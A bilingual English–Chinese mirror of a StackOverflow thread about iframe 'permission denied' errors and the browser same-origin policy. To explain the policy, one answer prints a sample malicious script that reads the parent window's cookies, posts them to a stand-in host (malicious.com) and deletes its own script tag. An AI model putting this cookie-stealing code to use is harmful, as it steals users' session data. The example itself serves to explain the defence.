javascript 权限被拒绝访问属性
声明:本页面是StackOverFlow热门问题的中英对照翻译,遵循CC BY-SA 4.0协议,如果您需要使用它,必须同样遵循CC BY-SA许可,注明原文地址和作者信息,同时你必须将它归于原作者(不是我):StackOverFlow
原文地址: http://stackoverflow.com/questions/16682987/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, But you must attribute it to the original authors (not me):
StackOverFlow
javascript permission denied to access property
提问by user2407689
I am having an issue accessing properties from a different iframe. I keep getting this permission denied to access property error. I have seen people ask if they are using file:/// several times but no one ever is (except me) so that never gets addressed.
我在从不同的 iframe 访问属性时遇到问题。我不断收到拒绝访问属性错误的权限。我见过有人问他们是否多次使用 file:/// 但从来没有人(除了我)所以永远不会得到解决。
I am not doing this on the web. the src for all my frames are in the same file on my hard drive. I am trying to get some properties from objects I created in other frame
我不是在网络上做这个。我所有帧的 src 都在我的硬盘驱动器上的同一个文件中。我试图从我在其他框架中创建的对象中获取一些属性
function fill_with_pairs()
{
for (var x = 0 ; x < setLength ; x++)
{
var tempSet = sets[x];
var tempNums = tempSet.wb_numbers;
if (top.num_frame.active_list.active_nums[x].checked)
{
for (var y = 0 ; y < 4 ; y++)
{
var thesePairs = tempNums[y];
var pairBase = numbersX[thesePairs];
for (var z = y+1 ; z < 5 ; z++)
{
var pairKey = tempNums[z];
pairBase[z]++;
}
}
}
}
}
回答by Isaac
The code below
下面的代码
<iframe src="http://example.com" onload="test(this)"></iframe>
<script>
function test(frame)
{
var cDoc = frame.contentDocument;
}
</script>
Throws
投掷
Unsafe JavaScript attempt to access frame with URL http://example.iana.org from frame with URL {your URL}. Domains, protocols and ports must match.
The protocols must match (eg: the main window and the iframe protocols must be either file:or http:to name a couple).
该协议必须(如:主窗口和iframe的协议必须是匹配file:或http:命名一对夫妇)。
The domains must match (eg: the main window and the iframe domains must be example.com)
域必须匹配(例如:主窗口和 iframe 域必须是example.com)
The ports must match (eg: the main window and the iframe ports must be 80or 8080)
端口必须匹配(例如:主窗口和 iframe 端口必须是80或8080)
This is to protect users from code being executed from malicious sites, which, had these boundaries not been put in place, could easily steal data from an unsuspecting user.
这是为了保护用户免受恶意站点执行的代码的侵害,如果没有设置这些边界,这些站点很容易从毫无戒心的用户那里窃取数据。
An example of malicious JavaScript code:
恶意 JavaScript 代码示例:
<script id="loadScript">
window.onload = function()
{
//grab parent to iframe
var parentWindow = window.parent.window;
//grab cookies from parent window
var cookies = parentWindow.document.cookie;
//send cookies off to malicious site
var form = document.createElement("form");
var inp = document.createElement("input");
form.action="http://malicious.com/maliciousAd.php";
form.method="post";
inp.value=cookies;
inp.name="cookies";
form.appendChild(inp);
form.submit();
//remove traces of malicious code
document.body.removeChild(document.getElementById("loadScript"))
}
</script>
回答by Alex W
Any JavaScript that attempts to access properties of a document on a different domain (e.g. in an iframeelement) is in violation of the security concept called the same origin policy.
任何尝试访问不同域(例如,iframe元素)中的文档属性的 JavaScript都违反了称为同源策略的安全概念。
In computing, the same origin policy is an important security concept for a number of browser-side programming languages, such as JavaScript. The policy permits scripts running on pages originating from the same site – a combination of scheme, hostname, and port number1– to access each other's methods and properties with no specific restrictions, but prevents access to most methods and properties across pages on different sites.
在计算中,同源策略是许多浏览器端编程语言(例如 JavaScript)的重要安全概念。该策略允许在源自同一站点的页面上运行的脚本(方案、主机名和端口号1的组合)可以不受特定限制地访问彼此的方法和属性,但阻止跨不同站点的页面访问大多数方法和属性.
